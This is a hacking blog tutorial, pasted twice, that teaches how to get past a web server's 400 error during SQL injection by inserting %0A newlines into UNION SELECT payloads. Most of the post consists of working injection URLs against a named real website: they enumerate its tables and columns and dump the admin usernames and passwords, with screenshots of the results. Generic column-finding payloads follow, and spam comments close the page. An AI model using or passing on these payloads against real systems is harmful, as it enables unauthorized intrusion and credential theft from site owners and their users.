# 400 bad request #
Ok so today i will teach you how to bypass 400 error
Ok so you trying to SQLI website and then 400 error appears :\ ( it's mean that your browser sent a request that this server could not understand ) it shoud look like this ( btw that website have have 1 column at the end ill try to explain what to do when there are more colums ) :![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uHro4IlCJSX8SoAu4rrcrL7ljtESBq2yFbTJRL4c1QauJoDCxj5yiIbw5APW3uQGCkcWrb9kbelLUcdQz1jx409HM0WQ=s0-d)
Also link if you wanna check it www.krumplitas.lt/index2.php?id=-1' union select group_concat(table_name)from information_schema.tables where table_schema=database()--+
First thing we need to do is to write %0A after union and before select ( union%0Aselect ) so it should look like :![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uC5cDxOLhW1OsT2Dzkzovb44iuAa2xTsrCI3sUyRRN5iLawVAFT0Bb4GMWNIbC48RsoJ4fvmoSsAnbnhnQ_-p92-tuXTE=s0-d)
Link : www.krumplitas.lt/index2.php?id=-1' union%0Aselect group_concat(table_name)from information_schema.tables where table_schema=database()--+
And yeah you bypassed that error
now we need to get information from table admin_users and when you try with union%0Aselect error appears again!
What we need to do is write another %0A at the CHARS=(97%0A, 101 , 96 .........)
ok so lets see whats happen the link is www.krumplitas.lt/index2.php?id=-1'union%0Aselect group_concat(column_name) from information_schema.columns where table_name=CHAR(97%0A,100, 109, 105, 110, 95, 117, 115, 101, 114, 115)--+
![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uW9wsRG5vxxAATeNyybsxSa8MQTMOwvoGiEiJxfn1XJvi-MwC7mtVBRJpkebTky0_DRVef_1uBvQPiqO7feTB5cl-dvw=s0-d)
and there you see you got information from admin_users !
and for the end link is www.krumplitas.lt/index2.php?id=-1'union%0Aselect group_concat(vardas,0x3a,slaptazodis) from admin_users--+
just add %0A after union and before select ( union%0Aselect )
and there you go you have login details! :![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uTkFybXj3MoeUQIIiDA1e6fMnxmAIdMmstcdr9UUzlE1CKnsNHVAy1T-BzbUAhBSCGXJsWENNUD2J27jT7fWBIkYMywGU=s0-d)
But sometimes you also need to know where error begins! for example website have 20 columns... for example :
site.com/something.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+/
And you see 400 error ;\ and you need to figure out where error start like :
site.com/somthing.php?id=1' union ( no error )
site.com/somthing.php?id=1' union select 1 +--+/ ( still no error )
site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12+--+/ ( still no error )
site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13+--+/ ( And error! )
So we know error starts at 13... so then you just add 13--+%0A,14--+%0A,15--+%0A untill you write all your columns so full url with 20 columns and error at 13 should look like : site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+%0A,14--+%0A,15--+%0A,16--+%0A,17--+%0A,18--+%0A,19--+%0A,20--+%0A--+
Ok so today i will teach you how to bypass 400 error
Ok so you trying to SQLI website and then 400 error appears :\ ( it's mean that your browser sent a request that this server could not understand ) it shoud look like this ( btw that website have have 1 column at the end ill try to explain what to do when there are more colums ) :
Also link if you wanna check it www.krumplitas.lt/index2.php?id=-1' union select group_concat(table_name)from information_schema.tables where table_schema=database()--+First thing we need to do is to write %0A after union and before select ( union%0Aselect ) so it should look like :
Link : www.krumplitas.lt/index2.php?id=-1' union%0Aselect group_concat(table_name)from information_schema.tables where table_schema=database()--+And yeah you bypassed that error
now we need to get information from table admin_users and when you try with union%0Aselect error appears again!
What we need to do is write another %0A at the CHARS=(97%0A, 101 , 96 .........)
ok so lets see whats happen the link is www.krumplitas.lt/index2.php?id=-1'union%0Aselect group_concat(column_name) from information_schema.columns where table_name=CHAR(97%0A,100, 109, 105, 110, 95, 117, 115, 101, 114, 115)--+
and there you see you got information from admin_users !
and for the end link is www.krumplitas.lt/index2.php?id=-1'union%0Aselect group_concat(vardas,0x3a,slaptazodis) from admin_users--+
just add %0A after union and before select ( union%0Aselect )
and there you go you have login details! :
But sometimes you also need to know where error begins! for example website have 20 columns... for example :
site.com/something.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+/
And you see 400 error ;\ and you need to figure out where error start like :
site.com/somthing.php?id=1' union ( no error )
site.com/somthing.php?id=1' union select 1 +--+/ ( still no error )
site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12+--+/ ( still no error )
site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13+--+/ ( And error! )
So we know error starts at 13... so then you just add 13--+%0A,14--+%0A,15--+%0A untill you write all your columns
so full url with 20 columns and error at 13 should look like : site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+%0A,14--+%0A,15--+%0A,16--+%0A,17--+%0A,18--+%0A,19--+%0A,20--+%0A--+
3 comments:
As long as you take a backup previous to your upgrade of Smile2Cloud , and test plugins and themes with the latest release on a test version of the site for any likely issues, you should be fine! I'll see about writing a more in-depth post on this as a few people asked me about this! Thanks for the feedback!
nice
White Hat Hacker: 400 Bad Request Bypass >>>>> Download Now
>>>>> Download Full
White Hat Hacker: 400 Bad Request Bypass >>>>> Download LINK
>>>>> Download Now
White Hat Hacker: 400 Bad Request Bypass >>>>> Download Full
>>>>> Download LINK hn
Post a Comment